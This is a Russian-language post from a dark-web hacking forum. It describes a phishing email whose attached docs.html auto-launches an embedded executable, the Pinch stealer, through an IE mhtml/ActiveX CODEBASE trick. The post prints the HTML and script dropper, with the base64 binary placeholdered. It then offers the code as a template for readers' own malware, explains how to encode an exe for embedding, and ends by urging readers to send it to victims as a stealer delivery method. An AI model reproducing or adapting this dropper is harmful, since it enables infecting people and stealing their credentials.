Запуск Ехе-файла через Html страницу(слито).

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

tskyfall

Участник

tskyfall

Участник
29 Июл 2016
104
41
Сидел я в интернет-клубе, ползал по просторам интернета и решил проверить свой почтовый ящик.
Там оказалось недавно пришедшее письмо странного содержания.
В начале втирали про что-то на русско-английском языке, а потом такая фраза: "Я слышал, что ты болеешь.
Выздоравливай скорее!". Примерно так. Что за чудо, я не болел уже давно.
К письму был прикреплен архив, защищенный паролем.
А пароль был в тексте письма: docs. В письме говорилось, что в архиве лежат пароли боссов.
Опять вирусы, подумал я и принялся обезвреживать бомбу.
Пароль к архиву подошел (так а тож), и передо мной предстал ни вчем не повинный html файлик объемом всего в 15 килобайт.
Ну естественно запускать я его не стал, а нажал "F4" (в Total Commander'e).
Откылся Блокнот, с содержанием файла docs.html.
Код:
MIME-Version: 1.0
Content-Location:file:///Pinch.exe
Content-Transfer-Encoding: base64
[BINARY TEXT VIRUS]
<title>Welcome - Home</title>
<body bgcolor=black scroll=no>
<script>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>Welcome - Home</title>
<body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">
Sorry, Error On This Page! Please Open With Internet Explorer</center>
<object style="cursor:cross-hair" alt="Sorry, Error On This Page!
Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe">
</object>')
}
setTimeout("malware()",150)
</script>
Строка [BINARY TEXT VIRUS] означает, что на этом месте был закодирован exe файл вируса, вставлять я его не стал, уж слишком много места займет.
Перед вами макет автозапуска виря из html файла.
Его можно использовать и для ваших творений.
Просто замените текст [BINARY TEXT VIRUS] на ваш код exe файла.
А код можно легко получить следующим образом...
Зайдите в почтовый клиент и нажмите "Написать новое сообщение", в открывшемся окне щелкните "Вставка" -> "Вложение файла".
Теперь "Файл" -> "Сохранить как...". После сохранения письма, его нужно открыть в Текстовом редакторе и вырезать тот самый код exe файла.
И все,отправляем жертву. Хороший способ для отправки стилера
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя